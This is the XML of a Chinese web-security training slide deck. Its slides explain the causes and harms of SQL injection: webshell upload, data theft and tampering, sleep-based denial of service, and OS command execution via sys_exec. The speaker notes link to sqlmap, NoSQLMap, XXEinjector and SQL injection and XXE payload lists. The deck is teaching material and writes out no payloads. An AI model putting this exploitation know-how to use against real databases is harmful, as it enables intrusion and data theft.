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tags/tag4.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73"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId74"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="1173" r:id="rId6"/>
    <p:sldId id="918" r:id="rId7"/>
    <p:sldId id="919" r:id="rId8"/>
    <p:sldId id="920" r:id="rId9"/>
    <p:sldId id="1174" r:id="rId10"/>
    <p:sldId id="1175" r:id="rId11"/>
    <p:sldId id="284" r:id="rId12"/>
    <p:sldId id="923" r:id="rId13"/>
    <p:sldId id="924" r:id="rId14"/>
    <p:sldId id="285" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="294" r:id="rId17"/>
    <p:sldId id="1050" r:id="rId18"/>
    <p:sldId id="1051" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="988" r:id="rId21"/>
    <p:sldId id="989" r:id="rId22"/>
    <p:sldId id="1052" r:id="rId23"/>
    <p:sldId id="1053" r:id="rId24"/>
    <p:sldId id="990" r:id="rId25"/>
    <p:sldId id="298" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="300" r:id="rId28"/>
    <p:sldId id="301" r:id="rId29"/>
    <p:sldId id="303" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="1180" r:id="rId33"/>
    <p:sldId id="310" r:id="rId34"/>
    <p:sldId id="1046" r:id="rId35"/>
    <p:sldId id="1047" r:id="rId36"/>
    <p:sldId id="1048" r:id="rId37"/>
    <p:sldId id="1165" r:id="rId38"/>
    <p:sldId id="1115" r:id="rId39"/>
    <p:sldId id="1116" r:id="rId40"/>
    <p:sldId id="1156" r:id="rId41"/>
    <p:sldId id="916" r:id="rId42"/>
    <p:sldId id="1158" r:id="rId43"/>
    <p:sldId id="1159" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="306" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="299" r:id="rId49"/>
    <p:sldId id="312" r:id="rId50"/>
    <p:sldId id="282" r:id="rId51"/>
    <p:sldId id="313" r:id="rId52"/>
    <p:sldId id="314" r:id="rId53"/>
    <p:sldId id="315" r:id="rId54"/>
    <p:sldId id="316" r:id="rId55"/>
    <p:sldId id="317" r:id="rId56"/>
    <p:sldId id="1176" r:id="rId57"/>
    <p:sldId id="1177" r:id="rId58"/>
    <p:sldId id="1160" r:id="rId59"/>
    <p:sldId id="1162" r:id="rId60"/>
    <p:sldId id="1169" r:id="rId61"/>
    <p:sldId id="1163" r:id="rId62"/>
    <p:sldId id="1167" r:id="rId63"/>
    <p:sldId id="1164" r:id="rId64"/>
    <p:sldId id="1168" r:id="rId65"/>
    <p:sldId id="1170" r:id="rId66"/>
    <p:sldId id="1166" r:id="rId67"/>
    <p:sldId id="1178" r:id="rId68"/>
    <p:sldId id="1172" r:id="rId69"/>
    <p:sldId id="1179" r:id="rId70"/>
    <p:sldId id="1171" r:id="rId71"/>
    <p:sldId id="259" r:id="rId72"/>
  </p:sldIdLst>
  <p:sldSz cx="24384000" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId75"/>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 id="4" name="loong xu" initials="lx" lastIdx="1" clrIdx="3">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="d545d42e4baed7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141" autoAdjust="0"/>
    <p:restoredTop sz="86058" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="936" y="96"/>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commentAuthors" Target="commentAuthor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handoutMaster" Target="handoutMasters/handoutMaster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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId78"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t>2023/7/7</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://blog.csdn.net/weixin_44189363/article/details/108277917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://blog.csdn.net/qq_41631806/article/details/105453071</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6561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https://sqlmap.org/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252180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96964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https://www.bilibili.com/read/cv6033252/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https://hack-security-tools-cn.readthedocs.io/zh_CN/latest/nosqlmap.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://zhuanlan.zhihu.com/p/139737334</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2873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p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞的原理、判别方法、利用手法</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571121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4402884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71153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787448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2419446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660728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4028625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4103051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283001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253544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3084376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27790222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https://www.cnblogs.com/bmjoker/p/9614990.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md#xxe-payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/enjoiz/XXEinjector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md#xxe-payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18584567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https://www.cnblogs.com/bmjoker/p/9614990.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md#xxe-payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/enjoiz/XXEinjector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md#xxe-payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2565960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90547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584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2160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dirty="0"/>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在某些情况下，攻击者可以升级 SQL 注入攻击以危害底层服务器或其他后端基础结构，或执行拒绝服务攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://github.com/payloadbox/sql-injection-payload-list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2023/7/7</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2023/7/7</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2023/7/7</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2023/7/7</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3.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4.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notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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825419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入产生的原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9010021-D605-FDC7-85FB-33B437712C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7412" y="4555940"/>
            <a:ext cx="16749176" cy="3939818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9855FAD-393E-FB00-490B-5A03EF5248CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="55594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Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞原理</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8891024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>代码。</a:t>
            </a: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拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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动态构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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en-US" altLang="zh-CN" sz="24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400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据库配置：比如对查询集不合理处理，允许任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>连接，配置允许文件读写导致攻击者可以上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、木马病毒等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6608F2BD-9648-417D-7F89-5945FBBA5929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="55594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Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞原理</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320215" y="3020704"/>
            <a:ext cx="9233530" cy="7891519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据泄露：</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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>攻击者可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据篡改：</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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>拒绝服务：</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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>通过执行恶意的耗时查询（例如执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>远程执行代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>MySQL/MariaDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>扩展函数允许执行操作系统命令。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>loadfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="514431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注入的危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C6CDBC-8FA5-0CEB-1EA3-3FED526208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6132" y="2784144"/>
            <a:ext cx="10924218" cy="650543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24084" y="2301992"/>
            <a:ext cx="22022419" cy="3724096"/>
          </a:xfrm>
